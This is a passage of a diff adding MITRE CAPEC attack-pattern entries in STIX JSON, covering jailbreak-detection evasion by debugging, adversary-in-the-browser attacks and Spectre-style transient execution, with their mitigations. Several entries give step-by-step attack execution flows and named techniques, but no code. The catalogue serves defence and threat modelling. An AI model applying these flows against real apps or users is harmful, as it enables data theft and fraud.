do not originate from outside of Apple's SDK.", + "id": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad5e1d79-01e2-4822-81ba-6cd81c7049e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application's memory at runtime in order to remove or bypass signature verification methods. This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-661", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/661.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + }, + { + "description": "Manuel Egele, Christopher Kruegel, Engin Kirda, Giovanni Vigna, PiOS: Detecting Privacy Leaks in iOS Applications, 2011--02---09", + "external_id": "REF-628", + "source_name": "reference_from_CAPEC", + "url": "https://www.ndss-symposium.org/wp-content/uploads/2017/09/egel.pdf" + } + ], + "id": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Debugging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application's signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The 'Restrict' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the 'Restrict' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

    2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Debug the target application: The adversary inserts the debugger into the program entry point of the mobile application, after the application's signature has been identified, to dump its memory contents.

    2. Techniques
    Insert the debugger at the mobile application's program entry point, after the application's signature has been identified.
    Dump the memory region containing the now decrypted code from the address space of the binary.

  2. Remove application signature verification methods: Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate.

Exploit

  1. Execute the application and evade Root/Jailbreak detection methods: The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.

    2. Techniques
    Optional: Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "A debugger must be able to be inserted into the targeted application." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about runtime debugging." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Instantiate checks within the application code that ensures debuggers are not attached.", + "id": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-661-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfe13500-1996-47bc-b16c-88e763f8de3d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "target_ref": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints.\n ", + "external_references": [ + { + "external_id": "CAPEC-662", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Man in the Browser", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Man-in-the-browser attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Man-in-the-browser attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-629", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Liviu Arsene, Oil and Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal, 2020--04---21, Bitdefender Labs", + "external_id": "REF-630", + "source_name": "reference_from_CAPEC", + "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/" + }, + { + "description": "Amit Klein, Man-in-the-Mobile Attacks Single Out Android, 2012--07---10, SecurityIntelligence", + "external_id": "REF-631", + "source_name": "reference_from_CAPEC", + "url": "https://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/" + }, + { + "description": "Kelly Jackson Higgins, New 'Boy In The Browser' Attacks On The Rise, 2011--02---14, Dark Reading, Informa PLC", + "external_id": "REF-632", + "source_name": "reference_from_CAPEC", + "url": "https://www.darkreading.com/risk/new-boy-in-the-browser-attacks-on-the-rise/d/d-id/1135247" + } + ], + "id": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Browser (AiTB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Man in the Browser", + "Boy in the Browser", + "Man in the Mobile" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a", + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary.\n ", + "\n In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]\n ", + "\n Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim's \"hosts\" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]\n ", + "\n Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. The adversary tricks the victim into installing the Trojan Horse malware onto their system.

    2. Techniques
    Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate.

  2. The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

Exploit

  1. The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

", + "x_capec_extended_description": "\n This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must install or convince a user to install a Trojan.", + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.", + "For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack." + ], + "x_capec_skills_required": { + "Medium": "Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.", + "id": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17c99f05-562d-4662-b800-5617b6dc75c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-malware tools, which can detect Trojan Horse malware.", + "id": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a77f1a6-7693-45ea-96fd-c6e1510943e8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7656220c-0e2c-4110-8dbf-66fc149793c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit user permissions to prevent browser pivoting.", + "id": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure browser sessions are regularly terminated and when their effective lifetime ends.", + "id": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67a5c853-3f88-42c9-836f-4737587b3cb1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + "external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology", + "external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

    2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

  2. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

    3. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

    3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

    2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don't share resources", + "id": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ff9f578-79d5-4352-a475-1b33b37b07a7", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables", + "id": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbff3867-2c77-46ca-911a-4348a280a4bb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution", + "id": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e424f3f2-c61b-4d4a-9e40-eef4438e644d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "target_ref": 